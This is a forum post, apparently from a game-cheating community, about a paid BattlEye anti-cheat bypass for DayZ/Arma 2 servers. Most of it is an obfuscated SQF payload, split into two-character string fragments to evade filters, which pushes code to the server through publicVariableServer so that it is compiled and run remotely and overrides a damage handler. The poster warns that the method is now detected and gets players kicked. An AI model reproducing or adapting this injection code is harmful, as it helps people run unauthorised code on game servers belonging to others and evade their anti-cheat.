Hansgender told me he's selling a detected bypass to all of his customers, and all of his resellers as well.
The real undetected RE bypass is private.
I'm pretty sure this one uses
Code:
remExField =
[nil,nil,";[(""0;""+""fn""+""c_""+""us""+""ec""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+""={""+""if""+""(i""+""sS""+""er""+""ve""+""r&""+""&(""+""(_""+""th""+""is""+"" s""+""el""+""ec""+""t ""+""2)""+""==""+""0)""+"")t""+""he""+""n{""+""_c""+""od""+""e=""+""ma""+""rk""+""er""+""Te""+""xt""+""'d""+""wa""+""rd""+""en""+""';""+""ca""+""ll""+"" c""+""om""+""pi""+""le""+"" _""+""co""+""de""+"";r""+""em""+""Ex""+""Fi""+""el""+""d=""+""[n""+""il""+"",n""+""il""+"",(""+""';""+""'+""+""_c""+""od""+""e+""+""';""+""')""+""];""+""pu""+""bl""+""ic""+""Va""+""ri""+""ab""+""le""+""'r""+""em""+""Ex""+""Fi""+""el""+""d'""+"";}""+""el""+""se""+""{_""+""th""+""is""+"" c""+""al""+""l ""+""co""+""mp""+""il""+""e ""+""pr""+""ep""+""ro""+""ce""+""ss""+""Fi""+""le""+""Li""+""ne""+""Nu""+""mb""+""er""+""s'""+""\z""+""\a""+""dd""+""on""+""s\""+""da""+""yz""+""_c""+""od""+""e\""+""co""+""mp""+""il""+""e\""+""fn""+""_d""+""am""+""ag""+""eH""+""an""+""dl""+""er""+"".s""+""qf""+""';""+""};""+""};""+""0"")]
execVM ('\z\ad'+'dons\dayz_co'+'de\medical\publicEH\promptRName.sqf');"];
publicVariableServer "remExField";
This is now part of the BE filters.
If you are using it, it is highly detected and slowly servers are starting to update their public var and remote exec filters (txt files).
So if you get kicked for public var 103, and you bought the remote exec.. It's detected.